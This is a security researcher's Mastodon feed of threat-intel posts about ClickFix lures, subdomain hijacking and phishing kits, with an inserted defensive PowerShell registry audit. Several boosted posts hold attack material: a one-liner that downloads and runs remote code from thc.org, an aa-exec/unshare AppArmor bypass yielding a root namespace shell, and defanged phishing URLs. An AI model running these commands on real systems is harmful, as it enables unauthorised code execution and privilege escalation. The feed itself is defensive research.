Randy

Tech, banjo, guitar, outdoors
#ReverseEngineering #DFIR #ThreatIntel

Randy boosted:
2025-05-23

Our latest blog is out! It covers a rising issue that many major organizations experience: Subdomain hijacking through abandoned cloud resources.

This research follows our reporting from earlier in the year about the CDC subdomain hijack. We initially assumed that this was an isolated incident. Well… We were wrong.

We tied some of this activity to a threat actor, dubbed Hazy Hawk, who hijacks high-profile subdomains which they use to conduct large-scale scams and malware distribution.

blogs.infoblox.com/threat-inte

#dns #threatintel #threatintelligence #cybercrime #cybersecurity #infosec #infoblox #infobloxthreatintel #scam #HazyHawk

a description of how hazy hawk attacks work
Randy boosted:
2025-05-14

I think I have a nice compromise #ClickFix ...fix for those places that just can't live without some Explorer niceties.

There is an alternative to the "Disable Windows shortcuts" GPO, which not only disables Win+ shortcuts, but also things like using UNC paths in the Explorer address bar.

Of course, Geoff Chappell lights the way.

I believe that GPO applies the REST_NORUN reg key and not REST_NOWINKEYS policies—despite the name.

If I apply the REST_NORUN reg setting directly, I get the same behavior as the GPO. The popup pictured here appears.

But if I instead set the REST_NOWINKEYS dialog, the Win+R shortcut is disabled, but other stuff (like UNC paths in explorer) still works! Now, this doesn't remove the Run command from the start menu, but it is at least a safety. Oh and one more thing: because that shortcut is now unregistered, you can register it yourself for something like a lil daemon that pops a message box saying Hey did a website tell you to do this? Don't!

You can try both settings.

REST_NORUN: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun

REST_NOWINKEYS: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoWinKeys

UPDATE: You can additionally disable only Win+R by setting HKEY_CURRENT_USER\SOFTWARE\Microsoft\CurrentVersion\Explorer\Advanced\DisabledHotkeys to a String value containing the Win shortcuts you want to disable. So a single R will do the trick. Note this only works at the user level.

Windows error popup: this operation has been cancelled due to restrictions on this computer. Please contact your system administrator.
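
Added example (not part of the post above): a PowerShell audit of the three Explorer restrictions the post compares, plus a helper that applies the narrower one (NoWinKeys at machine level, DisabledHotkeys=R at user level) so Win+R stops working while UNC paths in the address bar keep working. Assumptions: HKLM writes need an elevated shell, Explorer picks the values up at the next logon or after explorer.exe is restarted, and the DisabledHotkeys value sits under the standard HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced key.

```powershell
# Audit and optionally apply the Explorer restrictions discussed in the post.
# Example code added to this page, not from the original author.
# Assumption: run elevated when touching HKLM; user-level key is under
# HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced.

$PolicyKey   = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer'
$AdvancedKey = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced'

$Checks = @(
    @{ Name = 'REST_NORUN (NoRun)';         Path = $PolicyKey;   Value = 'NoRun' },
    @{ Name = 'REST_NOWINKEYS (NoWinKeys)'; Path = $PolicyKey;   Value = 'NoWinKeys' },
    @{ Name = 'DisabledHotkeys (per-user)'; Path = $AdvancedKey; Value = 'DisabledHotkeys' }
)

function Get-ExplorerRestriction {
    param([hashtable]$Check)

    # Read the value if the key and value exist; $null otherwise.
    $data = $null
    if (Test-Path $Check.Path) {
        $item = Get-ItemProperty -Path $Check.Path -Name $Check.Value -ErrorAction SilentlyContinue
        if ($item) { $data = $item.($Check.Value) }
    }

    # Describe what the current data does, per the post's observations.
    $effect = switch ($Check.Value) {
        'NoRun' {
            if ($data -eq 1) { 'Run dialog blocked; UNC paths in Explorer address bar also blocked' }
            else { 'not set' }
        }
        'NoWinKeys' {
            if ($data -eq 1) { 'Win+ shortcuts (incl. Win+R) unregistered; Explorer otherwise unaffected' }
            else { 'not set' }
        }
        'DisabledHotkeys' {
            if ($data) { 'Win+' + ($data.ToCharArray() -join ', Win+') + ' disabled for this user only' }
            else { 'not set' }
        }
    }

    [pscustomobject]@{
        Setting = $Check.Name
        Present = ($null -ne $data)
        Data    = $data
        Effect  = $effect
    }
}

function Set-WinRBlocked {
    # Apply the compromise from the post: block Win+R without NoRun.
    # -UserOnly skips the HKLM write (useful without admin rights).
    param([switch]$UserOnly)

    if (-not $UserOnly) {
        New-Item -Path $PolicyKey -Force | Out-Null
        Set-ItemProperty -Path $PolicyKey -Name 'NoWinKeys' -Value 1 -Type DWord
    }
    New-Item -Path $AdvancedKey -Force | Out-Null
    # String of Win+ letters to disable; a single 'R' covers the Run dialog.
    Set-ItemProperty -Path $AdvancedKey -Name 'DisabledHotkeys' -Value 'R' -Type String

    Write-Host 'Applied. Log off/on or restart explorer.exe for Explorer to re-read these values.'
}

# Audit current state
$Checks | ForEach-Object { Get-ExplorerRestriction -Check $_ } | Format-Table -AutoSize

# Uncomment to apply the narrower mitigation:
# Set-WinRBlocked            # machine-level NoWinKeys + per-user DisabledHotkeys
# Set-WinRBlocked -UserOnly  # per-user DisabledHotkeys only
```

Run the audit first on a reference machine with the "Disable Windows shortcuts" GPO applied to confirm which value the GPO actually writes, then compare against a machine where only NoWinKeys or DisabledHotkeys is set.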
Randy boosted:
2025-04-30

So, I asked GPT to help me deobfuscate this VBS script, and now I'm wondering if it's just fucking with me, or if I can never trust AI ever again.

GPT gave me a picture of an anime girl.

@deepthoughts10 @saltmyhash hey! i got that one to come up. did use salt's tip with using an Android UA. within the CSS was a comment in Chinese, so this appears to align with Krebs' article.

@deepthoughts10 actually haven't. i do see our folks going to them and have even gotten one or two myself.

looks like the URL you sent is already dead. no fun!

@threatcat_ch ah hah! sure enough, i just needed to scroll down. sheesh, sloppy code! smh

thank you for pointing that out!

@threatcat_ch hmm, i'm still seeing the mshta method

Javascript used by ClearFake

One less fake browser update campaign. Not to be left out, #SmartApeSG has switched to the #ClickFix technique.

Screenshot of a web browser showing a ClickFix dialog along with Notepad showing the malicious command placed in the paste buffer.

@crep1x i don't see a direct common artifact from the IOCs shared, but this looks just like #KongTuke

Randy boosted:
Tim (Wadhwa-)Brown (@timb_machine@infosec.exchange)
2025-04-01

Looking at qualys.com/2025/three-bypasses:

$ aa-exec -p trinity -- unshare -U -r -m /bin/bash
# id
uid=0(root) gid=0(root) groups=0(root),65534(nogroup)

(It's time to learn about namespaces =))

#linux, #threatintel

Randy boosted:
The Hacker's Choice (@thc@infosec.exchange)
2025-04-01

💥CVE-20250401 - 7350pipe - Linux Privilege Escalation (all versions). Exploit (1-liner):

“. <(curl -SsfL thc.org/7350pipe)”

@knitcode sorry to hear that. I'll think kind thoughts for you.

Randy boosted:
2025-03-28

Sophos MDR has observed two distinct social engineering campaigns using a technique referred to as ClickFix spiking during March. In both of these campaigns—one surging on March 2 and the other on March 12—the goal was deployment of SecTopRAT malware. We are tracking this activity as STAC6380. /1

Randy boosted:
2025-03-24

Tycoon 2FA (a prominent AitM phishing kit), targeting Microsoft and Google accounts, uses a new CAPTCHA page instead of the custom Cloudflare Turnstile page

e.g.
hxxps://ymi.bvyunz.]ru/3v4jfQ-cUo/
hxxps://xau.kolivax.]ru/ckYHFJN/
hxxps://ffqt.lzirleg.]es/VajlR/

Current decoy pages used since 18 March, changing every 3/4 weeks since the beginning of 2025:

urlscan.io/search/#page.title%

@dangoodin be sure to opt out of their AI training. There's no handy button. Admin must send an email request.

Randy boosted:
2025-03-19

@sekoia_io published a nice blog post about BSC (Binance Smart Chain) blog.sekoia.io/clearfakes-new-
@threatcat_ch is tracking BSC as well, and we share our gained information on Threatfox/MalwareBazaar @abuse_ch As a side note, most of the delivered payloads led to Rhadamanthys (malpedia.caad.fkie.fraunhofer.) instead of Lumma in the last few days.

@briankrebs funny you should post yesterday about #ClickFix . I blogged the day prior about a supply chain attack that presented that very threat. It's been a very popular technique with the TAs, many of which have switched from fake browser updates to it. And I can state that folks do fall for it.

rmceoin.github.io/malware-anal

Randy boosted:

Stumbled into a supply chain attack yesterday affecting over 100 auto dealerships. The third party was informed and has remediated.

rmceoin.github.io/malware-anal

#ClickFix

@knitcode @gentleshep FYI, there is a DGA being used by Apollo you might be interested in. It's email related, I just haven't seen the emails yet.

The format is t for subdomain, then apex domain has two words separated by a hyphen.

See this listing from @nopatience as well as this thread in general.

docs.proton.me/doc?mode=open-u

Client Info

Server: https://mastodon.social
Version: 2025.04
Repository: https://github.com/cyevgeniy/lmst